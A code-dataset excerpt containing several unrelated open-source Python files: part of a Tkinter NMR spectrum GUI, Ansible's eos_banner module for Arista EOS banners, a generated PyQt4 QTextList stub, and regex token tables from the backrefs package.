self.ok_button = _add_button(self.root, {"text": "OK" }, gk('10'), {"<Button-1>": self._ok})
self.cancel_button = _add_button(self.root, {"text": "Cancel"}, gk('11'), {"<Button-1>": self._cancel})
self.root.protocol("WM_DELETE_WINDOW", self._cl)
def _cl(self, *args):
self.root.destroy()
def _ok(self, *args):
self.value = self.entry.get()
self.root.destroy()
def _cancel(self, *args):
self.root.destroy()
class LoadGaussianPopup(object):
def __init__(self, parent, parser):
self.root = tk.Toplevel(parent.root)
self.parent = parent
self.parser = parser
ell = []
for at, pd in parser.peak_dict.items():
element = pd['Element']
if element not in ell:
ell.append(element)
self.element_label = _add_label(self.root, {"text": "Select Element:"}, gk('00w'))
self.elements_om, self.element = _add_optionmenu(self.root, 'H' if 'H' in ell else ell[0], ell, {}, gk('01ew'))
self.reference_label = _add_label(self.root, {"text": "Reference Shift (ppm):"}, gk('10w'))
self.reference_entry = _add_entry(self.root, "", {}, gk('11w'))
self.degeneracy_label = _add_label(self.root, {"text": "Degeneracy Threshold (Hz):"}, gk('20w'))
self.degeneracy_entry = _add_entry(self.root, "1", {}, gk('21w'))
self.decouple_label = _add_label(self.root, {"text": "Decouple Elements?"}, gk('30w'))
self.decouple = tk.BooleanVar(value=True)
_add_checkbutton(self.root, True, {}, gk('31'), variable=self.decouple)
self.go_button = _add_button(self.root, {"text": "Go"}, gk('40ew'), {"<Button-1>": self.go})
self.root.protocol("WM_DELETE_WINDOW", self._cl)
def _cl(self, *args):
self.root.destroy()
def _get_ref(self):
try:
reference = float(self.reference_entry.get())
if reference > 0:
return reference
except:
pass
msgbox.showerror("Error", "Reference Shift must be a positive float")
return None
def _get_degeneracy(self):
try:
degeneracy = float(self.degeneracy_entry.get())
if degeneracy > 0:
return degeneracy
except:
pass
msgbox.showerror("Error", "Degeneracy Threshold must be a positive float")
return None
def go(self, *args):
reference = self._get_ref()
if reference is None:
return
degeneracy_threshold = self._get_degeneracy()
if degeneracy_threshold is None:
return
chosen_element = self.element.get()
decouple = self.decouple.get()
self.parser.coupling_degeneracy_threshold = degeneracy_threshold
self.parser.set_j_degeneracy()
nmr_list = []
for at, pd in self.parser.peak_dict.items():
j_list= pd['J Coupling']
shift = pd['Shift']
element = pd['Element']
if element == chosen_element:
nmr_list.append([reference - shift, [[c, s, d] for c, s, e, d in j_list if not decouple or e == element]])
self.parent.gaussian_nmr_list = nmr_list
self.root.destroy()
def gk(string):
grid = "".join([s for s in string if s.isdigit()])
sticky = "".join([s for s in string if s in "news"])
grid = grid.ljust(6, '0')
r,c,rs,cs,px,py = [int(s) for s in grid]
g = {"row": r, "column": c}
if rs: g["rowspan"] = rs
if cs: g["columnspan"] = cs
if px: g["padx"] = px
if py: g["pady"] = px
if sticky: g["sticky"] = sticky
return g
def _add_frame(frame_kwargs={}, grid_kwargs={}):
"""Insert a frame (box) into parent.
With text, a labelled frame is used"""
if "text" in frame_kwargs:
frame = tk.LabelFrame(**frame_kwargs)
else:
frame = tk.Frame(**frame_kwargs)
frame.grid(**grid_kwargs)
return frame
def _add_label(frame, text_kwargs={}, grid_kwargs={}, config_kwargs={}):
"""Insert a label"""
label = tk.Label(frame, **text_kwargs)
label.grid(**grid_kwargs)
label.config(**config_kwargs)
return label
def _add_scale(frame, val, scale_kwargs={}, grid_kwargs={}, config_kwargs={}):
"""Insert a scrollable bar"""
variable = tk.StringVar()
variable.set(val)
scale = tk.Scale(frame, **scale_kwargs)
scale.set(variable.get())
scale.grid(**grid_kwargs)
scale.config(**config_kwargs)
scale.grid_columnconfigure(0, weight = 1)
return scale
def _add_button(frame, button_kwargs={}, grid_kwargs={}, bind_kwargs={}, config_kwargs={}):
"Insert a button"""
button = tk.Button(frame, **button_kwargs)
button.grid(**grid_kwargs)
for k, v in bind_kwargs.items():
button.bind(k, v)
button.config(bg = "blue", **config_kwargs)
return button
def _add_entry(frame, val, entry_kwargs={}, grid_kwargs={}, config_kwargs={}, attach_func=None):
"""Add a text entry"""
variable = tk.StringVar()
variable.set(val)
entry = tk.Entry(frame, textvariable=variable, **entry_kwargs)
entry.bind("<FocusOut>", attach_func)
entry.grid(**grid_kwargs)
entry.config(**config_kwargs)
return entry
def _add_optionmenu(frame, val, items, optionmenu_kwargs={}, grid_kwargs={}, config_kwargs={}):
"""Add a dropdown menu"""
variable = tk.StringVar()
variable.set(val)
optionmenu = tk.OptionMenu(frame, variable, *items, **optionmenu_kwargs)
optionmenu.grid(**grid_kwargs)
optionmenu.config(**config_kwargs)
return optionmenu, variable
def _add_radio(frame, val, radio_kwargs={}, grid_kwargs={}, config_kwargs={}, variable=None):
"""Add a radio button"""
if variable is None:
variable = tk.StringVar()
variable.set(val)
radio = tk.Radiobutton(frame, variable=variable, **radio_kwargs)
radio.grid(**grid_kwargs)
radio.config(**config_kwargs)
def _add_checkbutton(frame, val, checkbutton_kwargs={}, grid_kwargs={}, config_kwargs={}, variable=None):
"""Add a radio button"""
if variable is None:
variable = tk.BooleanVar()
variable.set(val)
checkbutton = tk.Checkbutton(frame, variable=variable, **checkbutton_kwargs)
checkbutton.grid(**grid_kwargs)
checkbutton.config(**config_kwargs)
return checkbutton
def _add_mpl_canvas(frame, figure, grid_kwargs={}):
canvas = FigureCanvasTkAgg(figure, frame)
canvas.show()
widget = canvas.get_tk_widget()
widget.grid(**grid_kwargs)
return canvas
if __name__ == "__main__":
gui = GUI()
|
gpl-3.0
|
kennethgillen/ansible
|
lib/ansible/modules/network/eos/eos_banner.py
|
1
|
5522
|
#!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: eos_banner
version_added: "2.3"
author: "Peter Sprygada (@privateip)"
short_description: Manage multiline banners on Arista EOS devices
description:
- This will configure both login and motd banners on remote devices
running Arista EOS. It allows playbooks to add or remote
banner text from the active running configuration.
extends_documentation_fragment: eos
options:
banner:
description:
- Specifies which banner that should be
configured on the remote device.
required: true
default: null
choices: ['login', 'banner']
text:
description:
- The banner text that should be
present in the remote device running configuration. This argument
accepts a multiline string. Requires I(state=present).
default: null
state:
description:
- Specifies whether or not the configuration is
present in the current devices active running configuration.
default: present
choices: ['present', 'absent']
"""
EXAMPLES = """
- name: configure the login banner
eos_banner:
banner: login
text: |
this is my login banner
that contains a multiline
string
state: present
- name: remove the motd banner
banner: motd
state: absent
"""
RETURN = """
commands:
description: The list of configuration mode commands to send to the device
returned: always
type: list
sample:
- banner login
- this is my login banner
- that contains a multiline
- string
- EOF
session_name:
description: The EOS config session name used to load the configuration
returned: if changes
type: str
sample: ansible_1479315771
"""
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.eos import load_config, run_commands
from ansible.module_utils.eos import eos_argument_spec, check_args
def map_obj_to_commands(updates, module):
commands = list()
want, have = updates
state = module.params['state']
if state == 'absent' and 'text' in have.keys() and have['text']:
commands.append('no banner %s' % module.params['banner'])
elif state == 'present':
if want['text'] and (want['text'] != have.get('text')):
if module.params['transport'] == 'cli':
commands.append('banner %s' % module.params['banner'])
commands.extend(want['text'].strip().split('\n'))
commands.append('EOF')
else:
# For EAPI we need to construct a dict with cmd/input
# key/values for the banner
commands.append({'cmd': 'banner %s' % module.params['banner'],
'input': want['text'].strip('\n')})
return commands
def map_config_to_obj(module):
output = run_commands(module, ['show banner %s' % module.params['banner']])
obj = {'banner': module.params['banner'], 'state': 'absent'}
if output:
if module.params['transport'] == 'cli':
obj['text'] = output[0]
else:
# On EAPI we need to extract the banner text from dict key
# 'loginBanner'
obj['text'] = output[0]['loginBanner'].strip('\n')
obj['state'] = 'present'
return obj
def map_params_to_obj(module):
text = module.params['text']
if text:
text = str(text).strip()
return {
'banner': module.params['banner'],
'text': text,
'state': module.params['state']
}
def main():
""" main entry point for module execution
"""
argument_spec = dict(
banner=dict(required=True, choices=['login', 'motd']),
text=dict(),
state=dict(default='present', choices=['present', 'absent'])
)
argument_spec.update(eos_argument_spec)
required_if = [('state', 'present', ('text',))]
module = AnsibleModule(argument_spec=argument_spec,
required_if=required_if,
supports_check_mode=True)
warnings = list()
check_args(module, warnings)
result = {'changed': False}
if warnings:
result['warnings'] = warnings
want = map_params_to_obj(module)
have = map_config_to_obj(module)
commands = map_obj_to_commands((want, have), module)
result['commands'] = commands
if commands:
commit = not module.check_mode
response = load_config(module, commands, commit=commit)
if response.get('diff') and module._diff:
result['diff'] = {'prepared': response.get('diff')}
result['session_name'] = response.get('session')
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
|
gpl-3.0
|
ProfessorX/Config
|
.PyCharm30/system/python_stubs/-1247971765/PyQt4/QtGui/QTextList.py
|
1
|
1994
|
# encoding: utf-8
# module PyQt4.QtGui
# from /usr/lib/python3/dist-packages/PyQt4/QtGui.cpython-34m-x86_64-linux-gnu.so
# by generator 1.135
# no doc
# imports
import PyQt4.QtCore as __PyQt4_QtCore
from .QTextBlockGroup import QTextBlockGroup
class QTextList(QTextBlockGroup):
""" QTextList(QTextDocument) """
def add(self, QTextBlock): # real signature unknown; restored from __doc__
""" QTextList.add(QTextBlock) """
pass
def count(self): # real signature unknown; restored from __doc__
""" QTextList.count() -> int """
return 0
def format(self): # real signature unknown; restored from __doc__
""" QTextList.format() -> QTextListFormat """
return QTextListFormat
def isEmpty(self): # real signature unknown; restored from __doc__
""" QTextList.isEmpty() -> bool """
return False
def item(self, p_int): # real signature unknown; restored from __doc__
""" QTextList.item(int) -> QTextBlock """
return QTextBlock
def itemNumber(self, QTextBlock): # real signature unknown; restored from __doc__
""" QTextList.itemNumber(QTextBlock) -> int """
return 0
def itemText(self, QTextBlock): # real signature unknown; restored from __doc__
""" QTextList.itemText(QTextBlock) -> str """
return ""
def remove(self, QTextBlock): # real signature unknown; restored from __doc__
""" QTextList.remove(QTextBlock) """
pass
def removeItem(self, p_int): # real signature unknown; restored from __doc__
""" QTextList.removeItem(int) """
pass
def setFormat(self, QTextListFormat): # real signature unknown; restored from __doc__
""" QTextList.setFormat(QTextListFormat) """
pass
def __init__(self, QTextDocument): # real signature unknown; restored from __doc__
pass
def __len__(self, *args, **kwargs): # real signature unknown
""" Return len(self). """
pass
|
gpl-2.0
|
shriker/sublime
|
Packages/backrefs/st3/backrefs/common_tokens.py
|
2
|
1495
|
"""
Common tokens shared between the different regex modules.
Licensed under MIT
Copyright (c) 2015 - 2016 Isaac Muse <isaacmuse@gmail.com>
"""
import re
# Unicode string related references
utokens = {
"replace_tokens": set("cCElL"),
"verbose_tokens": set("# "),
"empty": "",
"ls_bracket": "[",
"rs_bracket": "]",
"b_slash": "\\",
"esc_end": "\\E",
"end": "E",
"quote": "Q",
"lc": "l",
"lc_span": "L",
"uc": "c",
"uc_span": "C",
"hashtag": '#',
"nl": '\n',
"negate": '^',
"verbose_flag": 'x',
"re_replace_ref": re.compile(
r'''(?x)
(\\)+
(
[cClLE]
)? |
(
[cClLE]
)
'''
),
"unicode_flag": 'u'
}
# Byte string related references
btokens = {
"replace_tokens": set(
[b"c", b"C", b"E", b"l", b"L"]
),
"verbose_tokens": set([b"#", b" "]),
"empty": b"",
"ls_bracket": b"[",
"rs_bracket": b"]",
"b_slash": b"\\",
"esc_end": b"\\E",
"end": b"E",
"quote": b"Q",
"lc": b"l",
"lc_span": b"L",
"uc": b"c",
"uc_span": b"C",
"hashtag": b'#',
"nl": b'\n',
"negate": b'^',
"verbose_flag": b'x',
"re_replace_ref": re.compile(
br'''(?x)
(\\)+
(
[cClLE]
)? |
(
[cClLE]
)
'''
),
"re_flags": re.compile(
br'(?s)(\\.)|\(\?([iLmsux]+)\)|(.)'
),
"unicode_flag": b'u'
}
|
mit
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.